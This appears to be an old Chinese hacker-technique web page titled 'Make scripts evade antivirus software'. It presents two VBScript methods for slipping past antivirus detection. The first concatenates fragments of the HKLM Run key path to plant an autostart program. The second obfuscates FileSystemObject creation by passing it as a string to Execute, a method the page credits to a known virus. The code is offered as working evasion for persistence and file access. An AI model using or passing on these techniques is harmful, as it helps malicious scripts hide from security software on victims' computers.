Your Ad Here
首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 黑客技术 > 让脚本躲过杀毒软件
【标  题】:让脚本躲过杀毒软件
【关键字】:软件,脚本
【来  源】:网络

让脚本躲过杀毒软件

Your Ad Here   现在杀毒的对vbs相当敏感,只要发现对注册表的xx作,或使用vbs运行命令(加用户) 就可能被杀。下面谈2方法可以简单解决:

1.使用连接符"&" 如:
Set CURObj = CreateObject("WScript.Shell")
mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"
CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"

2.使用Execute函数(BY 动鲨 )

  一些杀毒软件,如瑞星,他门会监视网页中的代码,一旦你创建了FSO或写注册表,即使是正常的脚本他也会报告危险,但是当年新欢乐时光也用了FSO怎么就没报警呢?原因是这个病毒使用Execute这个函数来躲过了防火墙,呵呵。病毒将这段声明代码转化为字符串,然后通过Execute(String)函数执行,举个例子
str="set fso=CreateObject( " & chr(34) & "scrip" & chr(116)& "ing.FileSystemObject"&chr(34)&")"
msgbox str
Execute str
将如上的代码放入test.vbs中就会被创建FSO,而瑞星就不会报警了。

"过时"的无脚本网页木马:【上一篇】
如何保护肉鸡:【下一篇】
【相关文章】
  • "过时"的无脚本网页木马
  • 利用智能abc漏洞,破解网吧计费软件
  • 推荐使用的一些黑客软件
  • 备份.恢复.修改IIS站点IP的脚本
  • 脚本后门注入图片新方法
  • 代理跳板与其它突破封锁软件的比较
  • vbs文件躲避杀毒软件的方法
  • 注入: SQL脚本语言学习黑客篇
  • 浅析局域网脚本蠕虫的传播
  • 跨站脚本执行漏洞代码
  • 【随机文章】
  • 为AUTOLISP建立缺省输入函数
  • MS04-011远程缓冲区溢出代码
  • API之文件处理函数
  • SCO UNIX学习宝典(系统安装)
  • Wine 的安装和配置(实现中文输入法和中文的复制粘贴)
  • PCP协议实现详解
  • 用PHP函数解决SQL injection
  • DoSTOR存储分析 IBM进军持续数据保护(CDP)市场
  • 硬盘RAID技术详解
  • Oracle基本数据类型存储格式浅析(一)——字符类型
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 软讯网络 All Rigths Reserved.